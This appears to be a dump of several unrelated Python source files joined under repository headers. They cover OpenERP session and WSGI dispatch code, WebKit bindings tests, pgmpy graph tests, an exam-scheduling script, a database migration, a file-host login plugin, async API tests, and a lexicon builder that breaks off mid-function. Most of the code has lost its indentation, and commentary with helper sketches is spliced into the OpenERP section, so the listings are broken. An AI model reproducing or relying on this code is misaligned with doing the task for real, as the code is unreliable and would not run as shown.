@contextlib.contextmanager
def session_context(request, session_store, session_lock, sid):
with session_lock:
if sid:
request.session = session_store.get(sid)
else:
request.session = session_store.new()
try:
yield request.session
finally:
# Remove all OpenERPSession instances with no uid, they're generated
# either by login process or by HTTP requests without an OpenERP
# session id, and are generally noise
removed_sessions = set()
for key, value in request.session.items():
if not isinstance(value, session.OpenERPSession):
continue
if getattr(value, '_suicide', False) or (
not value._uid
and not value.jsonp_requests
# FIXME do not use a fixed value
and value._creation_time + (60*5) < time.time()):
_logger.debug('remove session %s', key)
removed_sessions.add(key)
del request.session[key]
with session_lock:
if sid:
# Re-load sessions from storage and merge non-literal
# contexts and domains (they're indexed by hash of the
# content so conflicts should auto-resolve), otherwise if
# two requests alter those concurrently the last to finish
# will overwrite the previous one, leading to loss of data
# (a non-literal is lost even though it was sent to the
                # client, and the client then errors)
#
# note that domains_store and contexts_store are append-only (we
# only ever add items to them), so we can just update one with the
# other to get the right result, if we want to merge the
# ``context`` dict we'll need something smarter
in_store = session_store.get(sid)
for k, v in request.session.iteritems():
stored = in_store.get(k)
if stored and isinstance(v, session.OpenERPSession):
if hasattr(v, 'contexts_store'):
del v.contexts_store
if hasattr(v, 'domains_store'):
del v.domains_store
if not hasattr(v, 'jsonp_requests'):
v.jsonp_requests = {}
v.jsonp_requests.update(getattr(
stored, 'jsonp_requests', {}))
# add missing keys
for k, v in in_store.iteritems():
if k not in request.session and k not in removed_sessions:
request.session[k] = v
session_store.save(request.session)
def session_gc(session_store):
if random.random() < 0.001:
        # we keep sessions for one week
last_week = time.time() - 60*60*24*7
for fname in os.listdir(session_store.path):
path = os.path.join(session_store.path, fname)
try:
if os.path.getmtime(path) < last_week:
os.unlink(path)
except OSError:
pass
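The opportunistic GC above fires on roughly 0.1% of requests and unlinks session files older than a week; the age check it applies can be isolated as a pure function (a sketch with hypothetical names, not the OpenERP API):

```python
import time

WEEK_SECONDS = 60 * 60 * 24 * 7

def is_expired(mtime, now=None, max_age=WEEK_SECONDS):
    # A session file is eligible for removal once its modification time
    # falls strictly behind the cutoff (now - max_age), matching the
    # os.path.getmtime() comparison above.
    if now is None:
        now = time.time()
    return mtime < now - max_age
```

Factoring the comparison out this way makes the boundary behaviour explicit: a file whose mtime equals the cutoff exactly is kept.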
#----------------------------------------------------------
# WSGI Application
#----------------------------------------------------------
# Add potentially missing (older ubuntu) font mime types
mimetypes.add_type('application/font-woff', '.woff')
mimetypes.add_type('application/vnd.ms-fontobject', '.eot')
mimetypes.add_type('application/x-font-ttf', '.ttf')
class DisableCacheMiddleware(object):
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
def start_wrapped(status, headers):
referer = environ.get('HTTP_REFERER', '')
parsed = urlparse.urlparse(referer)
debug = parsed.query.count('debug') >= 1
new_headers = []
unwanted_keys = ['Last-Modified']
if debug:
new_headers = [('Cache-Control', 'no-cache')]
unwanted_keys += ['Expires', 'Etag', 'Cache-Control']
for k, v in headers:
if k not in unwanted_keys:
new_headers.append((k, v))
start_response(status, new_headers)
return self.app(environ, start_wrapped)
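The header rewrite performed inside `start_wrapped` can be sketched as a pure function, which makes the debug behaviour easy to exercise on its own (the function name is illustrative):

```python
def filter_cache_headers(headers, debug):
    # In debug mode, strip validator/expiry headers and force no-cache;
    # otherwise only drop Last-Modified, mirroring DisableCacheMiddleware.
    new_headers = []
    unwanted_keys = ['Last-Modified']
    if debug:
        new_headers = [('Cache-Control', 'no-cache')]
        unwanted_keys += ['Expires', 'Etag', 'Cache-Control']
    new_headers.extend((k, v) for k, v in headers if k not in unwanted_keys)
    return new_headers
```

Keeping the filtering separate from the WSGI plumbing means the no-cache policy can be unit-tested without constructing an environ or a start_response callable.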
def session_path():
try:
import pwd
username = pwd.getpwuid(os.geteuid()).pw_name
except ImportError:
try:
username = getpass.getuser()
except Exception:
username = "unknown"
path = os.path.join(tempfile.gettempdir(), "oe-sessions-" + username)
try:
os.mkdir(path, 0700)
except OSError as exc:
if exc.errno == errno.EEXIST:
# directory exists: ensure it has the correct permissions
# this will fail if the directory is not owned by the current user
os.chmod(path, 0700)
else:
raise
return path
class Root(object):
"""Root WSGI application for the OpenERP Web Client.
"""
def __init__(self):
self.addons = {}
self.statics = {}
self.load_addons()
# Setup http sessions
path = session_path()
self.session_store = werkzeug.contrib.sessions.FilesystemSessionStore(path)
self.session_lock = threading.Lock()
_logger.debug('HTTP sessions stored in: %s', path)
def __call__(self, environ, start_response):
""" Handle a WSGI request
"""
return self.dispatch(environ, start_response)
def dispatch(self, environ, start_response):
"""
Performs the actual WSGI dispatching for the application, may be
wrapped during the initialization of the object.
Call the object directly.
"""
request = werkzeug.wrappers.Request(environ)
request.parameter_storage_class = werkzeug.datastructures.ImmutableDict
request.app = self
handler = self.find_handler(*(request.path.split('/')[1:]))
if not handler:
response = werkzeug.exceptions.NotFound()
else:
sid = request.cookies.get('sid')
if not sid:
sid = request.args.get('sid')
session_gc(self.session_store)
with session_context(request, self.session_store, self.session_lock, sid) as session:
result = handler(request)
if isinstance(result, basestring):
headers=[('Content-Type', 'text/html; charset=utf-8'), ('Content-Length', len(result))]
response = werkzeug.wrappers.Response(result, headers=headers)
else:
response = result
if hasattr(response, 'set_cookie'):
response.set_cookie('sid', session.sid)
return response(environ, start_response)
def load_addons(self):
""" Load all addons from addons patch containg static files and
controllers and configure them. """
for addons_path in openerp.modules.module.ad_paths:
for module in sorted(os.listdir(str(addons_path))):
if module not in addons_module:
manifest_path = os.path.join(addons_path, module, '__openerp__.py')
path_static = os.path.join(addons_path, module, 'static')
if os.path.isfile(manifest_path) and os.path.isdir(path_static):
manifest = ast.literal_eval(open(manifest_path).read())
manifest['addons_path'] = addons_path
_logger.debug("Loading %s", module)
if 'openerp.addons' in sys.modules:
m = __import__('openerp.addons.' + module)
else:
m = __import__(module)
addons_module[module] = m
addons_manifest[module] = manifest
self.statics['/%s/static' % module] = path_static
for k, v in controllers_class_path.items():
if k not in controllers_object_path and hasattr(v[1], '_cp_path'):
o = v[1]()
controllers_object[v[0]] = o
controllers_object_path[k] = o
if hasattr(o, '_cp_path'):
controllers_path[o._cp_path] = o
app = werkzeug.wsgi.SharedDataMiddleware(self.dispatch, self.statics)
self.dispatch = DisableCacheMiddleware(app)
def find_handler(self, *l):
"""
Tries to discover the controller handling the request for the path
specified by the provided parameters
:param l: path sections to a controller or controller method
:returns: a callable matching the path sections, or ``None``
:rtype: ``Controller | None``
"""
if l:
ps = '/' + '/'.join(filter(None, l))
method_name = 'index'
while ps:
c = controllers_path.get(ps)
if c:
method = getattr(c, method_name, None)
if method:
exposed = getattr(method, 'exposed', False)
if exposed == 'json':
_logger.debug("Dispatch json to %s %s %s", ps, c, method_name)
return lambda request: JsonRequest(request).dispatch(method)
elif exposed == 'http':
_logger.debug("Dispatch http to %s %s %s", ps, c, method_name)
return lambda request: HttpRequest(request).dispatch(method)
ps, _slash, method_name = ps.rpartition('/')
if not ps and method_name:
ps = '/'
return None
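The longest-prefix walk in `find_handler`, which peels trailing path segments into a candidate method name until a registered controller path matches, can be sketched in isolation (`resolve_path` is a hypothetical name):

```python
def resolve_path(path, registered_paths):
    # Walk from the full path toward the root; each rpartition step moves
    # the last segment into the candidate method name, which defaults to
    # 'index' when the full path itself names a controller.
    ps, method_name = path, 'index'
    while ps:
        if ps in registered_paths:
            return ps, method_name
        ps, _slash, method_name = ps.rpartition('/')
        if not ps and method_name:
            ps = '/'  # allow a root ('/') controller to catch the segment
    return None, None
```

So `/web/login` first tries the controller at `/web/login` with method `index`, then the controller at `/web` with method `login`, exactly as the loop above does before checking the `exposed` marker.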
def wsgi_postload():
openerp.wsgi.register_wsgi_handler(Root())
# vim:et:ts=4:sw=4:
|
walty8/trac | refs/heads/trunk | trac/admin/__init__.py | 8 | # -*- coding: utf-8 -*-
#
# Copyright (C)2006-2009 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
from trac.admin.api import *
|
jdar/phantomjs-modified | refs/heads/master | src/qt/qtwebkit/Tools/Scripts/webkitpy/bindings/main.py | 117 | # Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE COMPUTER, INC. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE COMPUTER, INC. OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import os
import os.path
import shutil
import subprocess
import sys
import tempfile
from webkitpy.common.checkout.scm.detection import detect_scm_system
from webkitpy.common.system.executive import ScriptError
class BindingsTests:
def __init__(self, reset_results, generators, executive):
self.reset_results = reset_results
self.generators = generators
self.executive = executive
def generate_from_idl(self, generator, idl_file, output_directory, supplemental_dependency_file):
cmd = ['perl', '-w',
'-IWebCore/bindings/scripts',
'WebCore/bindings/scripts/generate-bindings.pl',
# idl include directories (path relative to generate-bindings.pl)
'--include', '.',
'--defines', 'TESTING_%s' % generator,
'--generator', generator,
'--outputDir', output_directory,
'--supplementalDependencyFile', supplemental_dependency_file,
idl_file]
exit_code = 0
try:
output = self.executive.run_command(cmd)
if output:
print output
except ScriptError, e:
print e.output
exit_code = e.exit_code
return exit_code
def generate_supplemental_dependency(self, input_directory, supplemental_dependency_file, window_constructors_file, workerglobalscope_constructors_file, sharedworkerglobalscope_constructors_file, dedicatedworkerglobalscope_constructors_file):
idl_files_list = tempfile.mkstemp()
for input_file in os.listdir(input_directory):
(name, extension) = os.path.splitext(input_file)
if extension != '.idl':
continue
os.write(idl_files_list[0], os.path.join(input_directory, input_file) + "\n")
os.close(idl_files_list[0])
cmd = ['perl', '-w',
'-IWebCore/bindings/scripts',
'WebCore/bindings/scripts/preprocess-idls.pl',
'--idlFilesList', idl_files_list[1],
'--defines', '',
'--supplementalDependencyFile', supplemental_dependency_file,
'--windowConstructorsFile', window_constructors_file,
'--workerGlobalScopeConstructorsFile', workerglobalscope_constructors_file,
'--sharedWorkerGlobalScopeConstructorsFile', sharedworkerglobalscope_constructors_file,
'--dedicatedWorkerGlobalScopeConstructorsFile', dedicatedworkerglobalscope_constructors_file]
exit_code = 0
try:
output = self.executive.run_command(cmd)
if output:
print output
except ScriptError, e:
print e.output
exit_code = e.exit_code
os.remove(idl_files_list[1])
return exit_code
def detect_changes(self, generator, work_directory, reference_directory):
changes_found = False
for output_file in os.listdir(work_directory):
cmd = ['diff',
'-u',
'-N',
os.path.join(reference_directory, output_file),
os.path.join(work_directory, output_file)]
exit_code = 0
try:
output = self.executive.run_command(cmd)
except ScriptError, e:
output = e.output
exit_code = e.exit_code
if exit_code or output:
print 'FAIL: (%s) %s' % (generator, output_file)
print output
changes_found = True
else:
print 'PASS: (%s) %s' % (generator, output_file)
return changes_found
def run_tests(self, generator, input_directory, reference_directory, supplemental_dependency_file):
work_directory = reference_directory
passed = True
for input_file in os.listdir(input_directory):
(name, extension) = os.path.splitext(input_file)
if extension != '.idl':
continue
# Generate output into the work directory (either the given one or a
            # temp one if reset_results is not requested)
if not self.reset_results:
work_directory = tempfile.mkdtemp()
if self.generate_from_idl(generator,
os.path.join(input_directory, input_file),
work_directory,
supplemental_dependency_file):
passed = False
if self.reset_results:
print "Reset results: (%s) %s" % (generator, input_file)
continue
# Detect changes
if self.detect_changes(generator, work_directory, reference_directory):
passed = False
shutil.rmtree(work_directory)
return passed
def main(self):
current_scm = detect_scm_system(os.curdir)
os.chdir(os.path.join(current_scm.checkout_root, 'Source'))
all_tests_passed = True
input_directory = os.path.join('WebCore', 'bindings', 'scripts', 'test')
supplemental_dependency_file = tempfile.mkstemp()[1]
window_constructors_file = tempfile.mkstemp()[1]
workerglobalscope_constructors_file = tempfile.mkstemp()[1]
sharedworkerglobalscope_constructors_file = tempfile.mkstemp()[1]
dedicatedworkerglobalscope_constructors_file = tempfile.mkstemp()[1]
if self.generate_supplemental_dependency(input_directory, supplemental_dependency_file, window_constructors_file, workerglobalscope_constructors_file, sharedworkerglobalscope_constructors_file, dedicatedworkerglobalscope_constructors_file):
print 'Failed to generate a supplemental dependency file.'
os.remove(supplemental_dependency_file)
os.remove(window_constructors_file)
os.remove(workerglobalscope_constructors_file)
os.remove(sharedworkerglobalscope_constructors_file)
os.remove(dedicatedworkerglobalscope_constructors_file)
return -1
for generator in self.generators:
input_directory = os.path.join('WebCore', 'bindings', 'scripts', 'test')
reference_directory = os.path.join('WebCore', 'bindings', 'scripts', 'test', generator)
if not self.run_tests(generator, input_directory, reference_directory, supplemental_dependency_file):
all_tests_passed = False
os.remove(supplemental_dependency_file)
os.remove(window_constructors_file)
os.remove(workerglobalscope_constructors_file)
os.remove(sharedworkerglobalscope_constructors_file)
os.remove(dedicatedworkerglobalscope_constructors_file)
print ''
if all_tests_passed:
print 'All tests PASS!'
return 0
else:
print 'Some tests FAIL! (To update the reference files, execute "run-bindings-tests --reset-results")'
return -1
|
kris-singh/pgmpy | refs/heads/dev | pgmpy/tests/test_base/test_UndirectedGraph.py | 4 | #!/usr/bin/env python3
from pgmpy.base import UndirectedGraph
from pgmpy.tests import help_functions as hf
import unittest
class TestUndirectedGraphCreation(unittest.TestCase):
def setUp(self):
self.graph = UndirectedGraph()
def test_class_init_without_data(self):
self.assertIsInstance(self.graph, UndirectedGraph)
def test_class_init_with_data_string(self):
self.G = UndirectedGraph([('a', 'b'), ('b', 'c')])
self.assertListEqual(sorted(self.G.nodes()), ['a', 'b', 'c'])
self.assertListEqual(hf.recursive_sorted(self.G.edges()),
[['a', 'b'], ['b', 'c']])
def test_add_node_string(self):
self.graph.add_node('a')
self.assertListEqual(self.graph.nodes(), ['a'])
def test_add_node_nonstring(self):
self.graph.add_node(1)
self.assertListEqual(self.graph.nodes(), [1])
def test_add_nodes_from_string(self):
self.graph.add_nodes_from(['a', 'b', 'c', 'd'])
self.assertListEqual(sorted(self.graph.nodes()),
['a', 'b', 'c', 'd'])
def test_add_node_with_weight(self):
self.graph.add_node('a')
self.graph.add_node('weight_a', weight=0.3)
self.assertEqual(self.graph.node['weight_a']['weight'], 0.3)
self.assertEqual(self.graph.node['a']['weight'], None)
def test_add_nodes_from_with_weight(self):
self.graph.add_node(1)
self.graph.add_nodes_from(['weight_b', 'weight_c'], weights=[0.3, 0.5])
self.assertEqual(self.graph.node['weight_b']['weight'], 0.3)
self.assertEqual(self.graph.node['weight_c']['weight'], 0.5)
self.assertEqual(self.graph.node[1]['weight'], None)
def test_add_nodes_from_non_string(self):
self.graph.add_nodes_from([1, 2, 3, 4])
def test_add_edge_string(self):
self.graph.add_edge('d', 'e')
self.assertListEqual(sorted(self.graph.nodes()), ['d', 'e'])
self.assertListEqual(hf.recursive_sorted(self.graph.edges()),
[['d', 'e']])
self.graph.add_nodes_from(['a', 'b', 'c'])
self.graph.add_edge('a', 'b')
self.assertListEqual(hf.recursive_sorted(self.graph.edges()),
[['a', 'b'], ['d', 'e']])
def test_add_edge_nonstring(self):
self.graph.add_edge(1, 2)
def test_add_edges_from_string(self):
self.graph.add_edges_from([('a', 'b'), ('b', 'c')])
self.assertListEqual(sorted(self.graph.nodes()), ['a', 'b', 'c'])
self.assertListEqual(hf.recursive_sorted(self.graph.edges()),
[['a', 'b'], ['b', 'c']])
self.graph.add_nodes_from(['d', 'e', 'f'])
self.graph.add_edges_from([('d', 'e'), ('e', 'f')])
self.assertListEqual(sorted(self.graph.nodes()),
['a', 'b', 'c', 'd', 'e', 'f'])
self.assertListEqual(hf.recursive_sorted(self.graph.edges()),
hf.recursive_sorted([('a', 'b'), ('b', 'c'),
('d', 'e'), ('e', 'f')]))
def test_add_edges_from_nonstring(self):
self.graph.add_edges_from([(1, 2), (2, 3)])
def test_number_of_neighbors(self):
self.graph.add_edges_from([('a', 'b'), ('b', 'c')])
self.assertEqual(len(self.graph.neighbors('b')), 2)
def tearDown(self):
del self.graph
class TestUndirectedGraphMethods(unittest.TestCase):
def test_is_clique(self):
G = UndirectedGraph([('A', 'B'), ('C', 'B'), ('B', 'D'),
('B', 'E'), ('D', 'E'), ('E', 'F'),
('D', 'F'), ('B', 'F')])
self.assertFalse(G.is_clique(nodes=['A', 'B', 'C', 'D']))
self.assertTrue(G.is_clique(nodes=['B', 'D', 'E', 'F']))
self.assertTrue(G.is_clique(nodes=['D', 'E', 'B']))
def test_is_triangulated(self):
G = UndirectedGraph([('A', 'B'), ('A', 'C'),
('B', 'D'), ('C', 'D')])
self.assertFalse(G.is_triangulated())
G.add_edge('A', 'D')
self.assertTrue(G.is_triangulated())
|
AikawaKai/ExamCollision | refs/heads/master | corsi.py | 1 | import csv
import sys
import copy
import itertools
print("Welcome.\nThis Python program lets you check whether the exams chosen in your study plan are compatible (no collisions).\n\n")
input("Press Enter to continue...")
with open('csvnumesami.csv') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
print(row['num'], " ", row['esame'])
stringanum = input("Select the exams you want to attend this semester (enter the exam numbers, separated by spaces, in priority order, since the software checks for collisions in insertion order): \n")
nums = [int(n) for n in stringanum.split()]
#print(nums)
print("Here are the selected exams:\n")
with open('csvnumesami.csv') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
if int(row['num']) in nums:
print(row['num'], " ", row['esame'])
arrayCollision = [
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
[0, 0, 0, 0, 0],
]
mylist = []
basic = []
for n in nums:
with open('csvcorsiNum.csv') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
if int(row['esame']) == n:
basic.append([row['esame'],row['day'],row['hoursStart'],row['hoursEnd']])
mylist.append(basic)
basic=[]
"""
permutations of the exam order. Could be useful when generating the solution with the largest number of collision-free exams
print(list(itertools.permutations(mylist)))
"""
print(mylist)
listScartati=[]
flag=True
for esamDatas in mylist:
backUp = copy.deepcopy(arrayCollision)
for esamData in esamDatas:
for j in range(int(esamData[2]), int(esamData[3])+1):
#print ("Esame", esamData[0], "Giorno",esamData[1], " ","StartHour", j,"EndH ",esamData[3], arrayCollision[j][int(esamData[1])])
if arrayCollision[j][int(esamData[1])] == 1:
#print ("\nOPS OPS \nEsame", esamData[0], "Giorno",esamData[1], " ","StartHour", j,"EndH ",esamData[3], arrayCollision[j][int(esamData[1])])
flag=False
#print(flag,"\n")
break
if flag==True:
for j in range(int(esamData[2]), int(esamData[3])+1):
#print ("Sto inserendo...Esame", esamData[0], "Giorno",esamData[1], " ","StartHour", j,"EndH ",esamData[3], arrayCollision[j][int(esamData[1])])
arrayCollision[j][int(esamData[1])] = 1
else:
listScartati.append(esamData[0])
#print(backUp)
arrayCollision=copy.deepcopy(backUp)
flag=True
break
flag=True
for array in arrayCollision:
print(array)
print(listScartati)
for n in listScartati:
nums.remove(int(n))
print("\n\nHere are the exams you can take without collisions:\n")
with open('csvnumesami.csv') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
if int(row['num']) in nums:
print(row['num'], " ", row['esame'])
|
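The booking loop in `corsi.py` above marks used slots in a 10-hour-by-5-day grid (`arrayCollision`) and rolls back on a clash; a minimal, self-contained sketch of that overlap check (the day/hour tuples here are hypothetical, not read from the CSV files the script expects):

```python
def add_course(grid, day, start, end):
    """Try to book hours [start, end] on `day`; return False on a collision."""
    if any(grid[h][day] for h in range(start, end + 1)):
        return False
    for h in range(start, end + 1):
        grid[h][day] = 1
    return True

# 10 hour slots x 5 weekdays, mirroring arrayCollision above
grid = [[0] * 5 for _ in range(10)]
assert add_course(grid, day=0, start=2, end=4)      # first booking succeeds
assert not add_course(grid, day=0, start=4, end=6)  # overlaps hour 4 on day 0
assert add_course(grid, day=1, start=4, end=6)      # a different day is free
```

Unlike the script, this sketch checks the whole interval before writing, so no deep-copy backup of the grid is needed on failure.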
rdo-management/neutron | refs/heads/mgt-master | neutron/db/migration/alembic_migrations/versions/abc88c33f74f_lb_stats_needs_bigint.py | 17 | # Copyright 2014 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""lb stats
Revision ID: abc88c33f74f
Revises: 3d2585038b95
Create Date: 2014-02-24 20:14:59.577972
"""
# revision identifiers, used by Alembic.
revision = 'abc88c33f74f'
down_revision = '3d2585038b95'
from alembic import op
import sqlalchemy as sa
from neutron.db import migration
def upgrade():
if migration.schema_has_table('poolstatisticss'):
op.alter_column('poolstatisticss', 'bytes_in',
type_=sa.BigInteger(), existing_type=sa.Integer())
op.alter_column('poolstatisticss', 'bytes_out',
type_=sa.BigInteger(), existing_type=sa.Integer())
op.alter_column('poolstatisticss', 'active_connections',
type_=sa.BigInteger(), existing_type=sa.Integer())
op.alter_column('poolstatisticss', 'total_connections',
type_=sa.BigInteger(), existing_type=sa.Integer())
def downgrade():
pass
|
pattisdr/osf.io | refs/heads/develop | addons/osfstorage/admin.py | 13 | from django.contrib import admin
from .models import Region
class RegionAdmin(admin.ModelAdmin):
list_display = ['name', '_id', 'waterbutler_url', 'mfr_url']
admin.site.register(Region, RegionAdmin)
|
michaelgallacher/intellij-community | refs/heads/master | python/testData/stubs/DynamicDunderAll.py | 83 | __all__ = ['foo', 'bar']
for i in range(5):
__all__.append('f' + str(i))
|
alazaro/tennis_tournament | refs/heads/master | django/dispatch/__init__.py | 571 | """Multi-consumer multi-producer dispatching mechanism
Originally based on pydispatch (BSD) http://pypi.python.org/pypi/PyDispatcher/2.0.1
See license.txt for original license.
Heavily modified for Django's purposes.
"""
from django.dispatch.dispatcher import Signal, receiver |
tod31/pyload | refs/heads/stable | module/plugins/accounts/BitshareCom.py | 3 | # -*- coding: utf-8 -*-
from module.plugins.internal.Account import Account
class BitshareCom(Account):
__name__ = "BitshareCom"
__type__ = "account"
__version__ = "0.19"
__status__ = "testing"
__description__ = """Bitshare account plugin"""
__license__ = "GPLv3"
__authors__ = [("Paul King", None)]
def grab_info(self, user, password, data):
html = self.load("http://bitshare.com/mysettings.html")
if "\"http://bitshare.com/myupgrade.html\">Free" in html:
return {'validuntil': -1, 'trafficleft': -1, 'premium': False}
        if '<input type="checkbox" name="directdownload" checked="checked" />' not in html:
self.log_warning(_("Activate direct Download in your Bitshare Account"))
return {'validuntil': -1, 'trafficleft': -1, 'premium': True}
def signin(self, user, password, data):
html = self.load("https://bitshare.com/login.html",
post={'user' : user,
'password': password,
'submit' : "Login"})
if "login" in self.req.lastEffectiveURL:
self.fail_login()
|
girishramnani/pyappbase | refs/heads/master | tests/test_async.py | 1 | import asyncio
import time
import unittest
from test_sync import setup
from pyappbase import Appbase
async def hello_world(d, data):
while d[0]:
await asyncio.sleep(0.1)
data.append("Hello")
class AsyncTests(unittest.TestCase):
def setUp(self):
self.data = {
"type": "Books",
"id": "X2",
}
self.appbase = setup(Appbase)
self.appbase._set_async()
self.sync_appbase = setup(Appbase)
print(self.sync_appbase.index({
"type": "Books",
"id": "X2",
"body": {
"department_id": 1,
"department_name": "Books",
"name": "A Fake Book on Network Routing",
"price": 5295
}
}))
def test_async_sync_ping_comparison(self):
"""
        This test runs the sync and async methods 'call_counts' times and checks
        that the async version is faster than the sync one.
:return:
"""
# number of simultaneous calls
call_counts = 4
t = time.time()
for i in range(call_counts):
print(self.sync_appbase.ping())
sync_difference = time.time() - t
print()
        print("Synchronous method took ", sync_difference, "s")
async def get_data():
return await self.appbase.ping()
t = time.time()
loop = asyncio.get_event_loop()
async def get_data_gathered():
answer = await asyncio.gather(*[get_data() for _ in range(call_counts)], loop=loop)
return answer
print("".join(loop.run_until_complete(get_data_gathered())))
async_difference = time.time() - t
        print("Asynchronous method took ", async_difference, "s")
print()
        # the async version should be faster
self.assertGreater(sync_difference, async_difference)
def test_async_two_methods(self):
"""
        simple test: run ping asynchronously alongside the hello_world coroutine
:return:
"""
        # something mutable, so the coroutine can observe the flag change
wait = [True]
data = []
asyncio.get_event_loop().create_task(hello_world(wait, data))
results = asyncio.get_event_loop().run_until_complete(self.appbase.ping())
wait[0] = False
async def temp():
await asyncio.sleep(1)
asyncio.get_event_loop().run_until_complete(temp())
print(results)
        self.assertNotEqual(len(data), 0)
def test_async_get(self):
async def get_data():
return await self.appbase.get(self.data)
results = asyncio.get_event_loop().run_until_complete(get_data())
self.assertEqual(results["_source"]["name"], "A Fake Book on Network Routing")
def test_async_index(self):
async def index_data():
return await self.appbase.index({
"type": "Books",
"id": "X2",
"body": {
"department_id": 1,
"department_name": "Books",
"name": "A Fake Book on Distributed Compute",
"price": 5295
}
})
async def get_data():
return await self.appbase.get(self.data)
index = asyncio.get_event_loop().run_until_complete(index_data())
result = asyncio.get_event_loop().run_until_complete(get_data())
self.assertEqual(result["_source"]["name"], "A Fake Book on Distributed Compute")
|
waytai/odoo | refs/heads/8.0 | addons/base_import_module/__init__.py | 3964 | import controllers
import models
|
Parsely/python-bloomfilter | refs/heads/master | pybloom/__init__.py | 1 | """pybloom
"""
from pybloom import BloomFilter, ScalableBloomFilter, __version__, __author__
from cdbf import CountdownBloomFilter, ScalableCountdownBloomFilter
from hashfilter import HashFilter
|
WladimirSidorenko/SentiLex | refs/heads/master | scripts/vo.py | 1 | #!/usr/bin/env python2.7
# -*- mode: python; coding: utf-8; -*-
"""Module for generating lexicon using Velikovich's method (2010).
"""
##################################################################
# Imports
from __future__ import unicode_literals, print_function
from collections import Counter
from copy import deepcopy
from datetime import datetime
from itertools import chain
from theano import tensor as TT
from sklearn.model_selection import train_test_split
import codecs
import numpy as np
import sys
import theano
from common import BTCH_SIZE, ENCODING, EPSILON, ESC_CHAR, FMAX, FMIN, \
INFORMATIVE_TAGS, MIN_TOK_CNT, \
NEGATIVE_IDX, NEUTRAL_IDX, POSITIVE_IDX, NONMATCH_RE, SENT_END_RE, \
TAB_RE, check_word, floatX, sgd_updates_adadelta
from common import POSITIVE as POSITIVE_LBL
from common import NEGATIVE as NEGATIVE_LBL
from germanet import normalize
##################################################################
# Constants
DFLT_T = 20
FASTMODE = False
MAX_NGHBRS = 25
TOK_WINDOW = 4 # it actually corresponds to a window of six
MAX_POS_IDS = 10000
MAX_EPOCHS = 5
MIN_EPOCHS = 3
UNK = "%unk%"
UNK_I = 0
##################################################################
# Methods
def _read_files_helper(a_crp_files, a_encoding=ENCODING):
"""Read corpus files and execute specified function.
@param a_crp_files - files of the original corpus
@param a_encoding - encoding of the vector file
@return (Iterator over file lines)
"""
i = 0
tokens_seen = False
for ifname in a_crp_files:
with codecs.open(ifname, 'r', a_encoding) as ifile:
for iline in ifile:
iline = iline.strip().lower()
if not iline or SENT_END_RE.match(iline):
continue
elif iline[0] == ESC_CHAR:
if FASTMODE:
i += 1
if i > 300:
break
if tokens_seen:
tokens_seen = False
yield None, None, None
continue
try:
iform, itag, ilemma = TAB_RE.split(iline)
                except ValueError:
print("Invalid line format at line: {:s}".format(
repr(iline)), file=sys.stderr
)
continue
tokens_seen = True
yield iform, itag, normalize(ilemma)
yield None, None, None
def _read_files(a_crp_files, a_pos, a_neg, a_neut,
a_pos_re=NONMATCH_RE, a_neg_re=NONMATCH_RE,
a_encoding=ENCODING):
"""Read corpus files and populate one-directional co-occurrences.
@param a_crp_files - files of the original corpus
@param a_pos - initial set of positive terms
@param a_neg - initial set of negative terms
@param a_neut - initial set of neutral terms
@param a_pos_re - regular expression for matching positive terms
@param a_neg_re - regular expression for matching negative terms
@param a_encoding - encoding of the vector file
@return (word2vecid, x, y)
@note constructs statistics in place
"""
print("Populating corpus statistics...",
end="", file=sys.stderr)
word2cnt = Counter(ilemma
for _, itag, ilemma in _read_files_helper(a_crp_files,
a_encoding)
if ilemma is not None and itag[:2] in INFORMATIVE_TAGS
and check_word(ilemma))
print(" done", file=sys.stderr)
word2vecid = {UNK: UNK_I}
for w in chain(a_pos, a_neg, a_neut):
word2vecid[w] = len(word2vecid)
# convert words to vector ids if their counters are big enough
for w, cnt in word2cnt.iteritems():
if cnt >= MIN_TOK_CNT or a_pos_re.search(w) or a_neg_re.search(w):
word2vecid[w] = len(word2vecid)
word2cnt.clear()
# generate the training set
def check_in_seeds(a_form, a_lemma, a_seeds, a_seed_re):
